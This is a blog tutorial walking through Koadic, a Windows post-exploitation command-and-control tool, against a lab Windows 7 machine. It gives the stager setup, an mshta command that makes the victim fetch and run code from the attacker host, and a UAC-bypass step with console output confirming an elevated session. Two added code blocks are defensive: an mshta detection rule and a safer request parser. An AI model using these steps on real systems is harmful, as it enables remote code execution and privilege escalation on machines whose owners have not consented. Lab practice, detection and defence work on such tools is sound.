Installing and Using Koadic
Date: 2023-07-14

Overview

Koadic is a post-exploitation tool released at DEFCON; it performs most of its work through VBScript and JScript.

Environment

I prepared two virtual machines: a Kali box as the attacker machine,
and a 64-bit Windows 7 box as the victim.

Installation

Installation is simple:

git clone https://github.com/zerosum0x0/koadic.git

Then install the dependencies:

cd koadic/
pip install -r requirements.txt

Usage

Run it:

./koadic

                        .
                       / \
 _                   _ | |
| | _____   __ _  __| || |  ___
| |/ / _ \ / _` |/ _` ||.| / __|
|   / (o) | (_| | (_| ||.|| (__
|_|\_\_^_/ \__,_|\__,_||:| \___|
                       |:|
                    ~\====/~

                        O

    -{ COM Command & Control }-
  Windows Post-Exploitation Tools
         Endless Intellect

        ~[ Version:  0x8 ]~
        ~[ Stagers:     ]~
        ~[ Implants:   ]~

(koadic: sta/js/mshta)#

First, we need to understand a few of the tool's concepts:

  • Stagers are the kinds of payload generated for the machine you are attacking
  • Implants are the operations you can perform once you control a machine

For the specific stagers and implants, see the project's GitHub page:
https://github.com/zerosum0x0/koadic

Next, run:

use stager/js/mshta

This selects the mshta stager.
Next, set the local IP and port for the listener.
You can enter the info command to see which parameters need to be set:

set LHOST 192.168.1.104
set LPORT

Then run:

run
(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.1.104:9999/BYhBU
[>] mshta http://192.168.1.104:9999/BYhBU

Since this is a post-exploitation tool, by definition you can already execute a command on the machine you control.

On the victim machine, execute:

mshta http://192.168.1.104:9999/BYhBU

In my case I just opened a cmd window and ran it.
Next comes a pitfall with Python string encoding: the following error appears:
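As an added example (not from this post or from Koadic), here is how a defender can pick up the launch pattern used above, mshta.exe fetching a remote HTA over HTTP, from process-creation records; the record fields and the sample events are constructed for this example, not a real log schema.

```python
import re
from typing import Optional
from urllib.parse import urlsplit

# Any http(s) URL on the command line.
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)

# Constructed process-creation records (image, parent, command line);
# the first one is the command the post runs on the victim.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe", "parent": "cmd.exe",
     "cmdline": "mshta http://192.168.1.104:9999/BYhBU"},
    {"image": r"C:\Windows\System32\mshta.exe", "parent": "explorer.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" C:\Users\bboysoul\setup.hta'},
    {"image": r"C:\Windows\System32\notepad.exe", "parent": "explorer.exe",
     "cmdline": "notepad.exe http://intranet.example/readme.txt"},
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_mshta(event: dict) -> bool:
    """True when the image, or the first command-line token, is mshta(.exe)."""
    if _basename(event.get("image", "")) == "mshta.exe":
        return True
    tokens = event.get("cmdline", "").split(None, 1)
    return bool(tokens) and _basename(tokens[0].strip('"')) in ("mshta", "mshta.exe")


def check_event(event: dict) -> Optional[dict]:
    """Finding when mshta is launched with a remote http(s) URL, else None."""
    if not is_mshta(event):
        return None
    m = URL_RE.search(event.get("cmdline", ""))
    if not m:
        return None  # a local .hta is a different (and noisier) pattern
    u = urlsplit(m.group(0))
    return {"rule": "mshta_remote_hta", "host": u.hostname, "port": u.port,
            "path": u.path, "parent": event.get("parent")}


def scan(events: list) -> list:
    """All findings over a batch of process-creation records."""
    return [f for f in map(check_event, events) if f]
```

The parent process is kept in the finding because a shell or script host spawning mshta with a URL is the part worth triaging first.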

(koadic: sta/js/mshta)# ----------------------------------------
Exception happened during processing of request from ('192.168.1.110', )
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line , in process_request_thread
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line , in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line , in __init__
self.handle()
File "/root/koadic/core/handler.py", line , in handle
return BaseHTTPRequestHandler.handle(self)
File "/usr/lib/python2.7/BaseHTTPServer.py", line , in handle
self.handle_one_request()
File "/usr/lib/python2.7/BaseHTTPServer.py", line , in handle_one_request
method()
File "/root/koadic/core/handler.py", line , in do_POST
self.session.parse_user_info(data)
File "/root/koadic/core/session.py", line , in parse_user_info
data = data.decode().split("~~~")

UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 65: ordinal not in range(128)

[!] Zombie : Timed out.

That is, this error:

UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 65: ordinal not in range(128)

You just need to switch the default character encoding to UTF-8.

Here is how. First exit the program, then open this file:

vim koadic

and add:

import sys
reload(sys)
sys.setdefaultencoding('utf-8')

The whole file then looks like this:

#!/usr/bin/env python

import sys
reload(sys)
sys.setdefaultencoding('utf-8')

"""
Copyright (c) - RiskSense, Inc.

Licensed under the Apache License, Version 2.0 (the "License"); you may not
use the software except in compliance with the License.
You may obtain a copy of the License at:

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations under
the License.

Disclaimer:
Usage of Koadic for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state,
federal, and international laws. Developers assume no liability and are not
responsible for any misuse or damage caused by this program.
"""

__version_info__ = (, )
__version__ = "x".join(map(str, __version_info__))
__license__ = "Apache 2.0"
__credits__ = ["zerosum0x0", "jmage", "TheNaterz", "aleph-naught-"]

if __name__ == "__main__":
    import core.shell

    # The banner is read as bytes and decoded explicitly; the user-info
    # handler further down the stack relied on the interpreter default.
    banner = open("data/banner.txt", "rb").read().decode("unicode_escape")

    shell = core.shell.Shell(banner, __version__)
    shell.run()

After that, repeat the steps above and the error no longer occurs.
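As an added example (not Koadic's own code), the following reproduces why the handler failed and shows the alternative of decoding the POSTed record with an explicit codec rather than resetting the interpreter default; it runs under Python 3, where bytes.decode() already defaults to UTF-8, so the failing path decodes as ASCII explicitly. The field names, their order and the sample body are assumptions modelled on the zombies output, not Koadic's real record layout.

```python
# Assumed field order for the "~~~"-delimited record (not Koadic's real layout).
FIELDS = ("user", "hostname", "dc", "os", "arch", "elevated")

# Constructed sample body; "专业版" encodes to UTF-8 bytes e4 b8 93 ...,
# so its first byte is the 0xe4 named in the post's traceback.
SAMPLE_BODY = "~~~".join((
    "WIN-HK90RUM6L1B\\bboysoul", "WIN-HK90RUM6L1B", "Unknown",
    "Microsoft Windows 专业版", "64-bit", "No",
)).encode("utf-8")


def first_non_ascii_offset(data: bytes) -> int:
    """Offset of the first byte >= 0x80 (the position the ASCII codec reports), or -1."""
    return next((i for i, b in enumerate(data) if b >= 0x80), -1)


def ascii_decode_fails(data: bytes) -> bool:
    """Reproduce Python 2's implicit ASCII decode of the request body."""
    try:
        data.decode("ascii")
    except UnicodeDecodeError:
        return True
    return False


def parse_user_info(data: bytes, encoding: str = "utf-8") -> dict:
    """Decode with an explicit codec, then split on the delimiter.

    errors="replace" keeps a malformed body (the client controls it) from
    killing the handler thread the way the post's traceback shows the
    ASCII decode did; a wrong field count is reported instead of guessed at.
    """
    parts = data.decode(encoding, errors="replace").split("~~~")
    if len(parts) != len(FIELDS):
        raise ValueError("expected %d fields, got %d" % (len(FIELDS), len(parts)))
    return dict(zip(FIELDS, parts))
```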

(koadic: sta/js/mshta)# use stager/js/mshta
(koadic: sta/js/mshta)# set LHOST 192.168.1.104
[+] LHOST => 192.168.1.104
(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.1.104:9999/N435X
[>] mshta http://192.168.1.104:9999/N435X
[+] Zombie : Staging new connection (192.168.1.110)
[+] Zombie : WIN-HK90RUM6L1B\bboysoul @ WIN-HK90RUM6L1B -- Microsoft Windows 专业版
(koadic: sta/js/mshta)#

Next we escalate privileges, that is, a UAC bypass.

Enter zombies to list the machines we control:

(koadic: sta/js/mshta)# zombies

ID   IP              STATUS  LAST SEEN  
---  ---------       ------- ------------  
    192.168.1.110   Alive   -- ::

Use "zombies ID" for detailed information about a session.

Enter zombies 0 to view detailed information about this machine:

(koadic: sta/js/mshta)# zombies

ID:  
Status:                 Alive  
Last Seen:              -- ::             

IP:                     192.168.1.110  
User:                   WIN-HK90RUM6L1B\bboysoul
Hostname:               WIN-HK90RUM6L1B  
Primary DC:             Unknown  
OS:                     Microsoft Windows  专业版  
OSArch:                 -bit  
Elevated:               No                              

User Agent:             Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.; SLCC2; .NET CLR 3.5.; .NET CLR 3.0.; Media Center PC 6.0)  
Session Key:            f4d7735b8a9d45a5a74ed5a63a164421

JOB  NAME                            STATUS  ERRNO  
---- ---------                       ------- ------- 

You can see that Elevated shows No, meaning we have not escalated privileges yet.
Enter:

use implant/elevate/bypassuac_eventvwr

Look at this module's info:

(koadic: imp/ele/bypassuac_eventvwr)# info

NAME        VALUE           REQ     DESCRIPTION  
-----       ------------    ----    -------------  
PAYLOAD                     yes     run payloads for a list  
ZOMBIE      ALL             yes     the zombie to target

Here we set both PAYLOAD and ZOMBIE to 0: PAYLOAD 0 means no payload is used, and ZOMBIE 0 is the ID of the zombie.
Then just run:

(koadic: imp/ele/bypassuac_eventvwr)# run
[*] Zombie : Job (implant/elevate/bypassuac_eventvwr) created.
[+] Zombie : Job (implant/elevate/bypassuac_eventvwr) completed.
[+] Zombie : Staging new connection (192.168.1.110)
[+] Zombie : WIN-HK90RUM6L1B\bboysoul* @ WIN-HK90RUM6L1B -- Microsoft Windows 专业版

Success.
Note, however, that the program sets up a new connection to perform the bypass, so although the original zombie connection still exists, it is still the unelevated user; the newly created connection is the one running as the elevated user. If you don't believe it, enter zombies and check whether an extra connection has appeared:

(koadic: imp/ele/bypassuac_eventvwr)# zombies

ID   IP              STATUS  LAST SEEN  
---  ---------       ------- ------------  
    192.168.1.110   Alive   -- ::  
*   192.168.1.110   Alive   -- ::

Use "zombies ID" for detailed information about a session.

Look at zombie 1's information:

(koadic: imp/ele/bypassuac_eventvwr)# zombies

ID:  
Status:                 Alive  
Last Seen:              -- ::             

IP:                     192.168.1.110  
User:                   WIN-HK90RUM6L1B\bboysoul*
Hostname:               WIN-HK90RUM6L1B  
Primary DC:             Unknown  
OS:                     Microsoft Windows  专业版  
OSArch:                 -bit  
Elevated:               YES!                            

User Agent:             Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.; SLCC2; .NET CLR 3.5.; .NET CLR 3.0.; Media Center PC 6.0)  
Session Key:            c42dec18786a47f2bc4ee023dc8f69bd

JOB  NAME                            STATUS  ERRNO  
---- ---------                       ------- ------- 

It confirms the privilege escalation succeeded.
Once privileges are elevated we can use all of the modules under implant; explore the specific modules yourself.
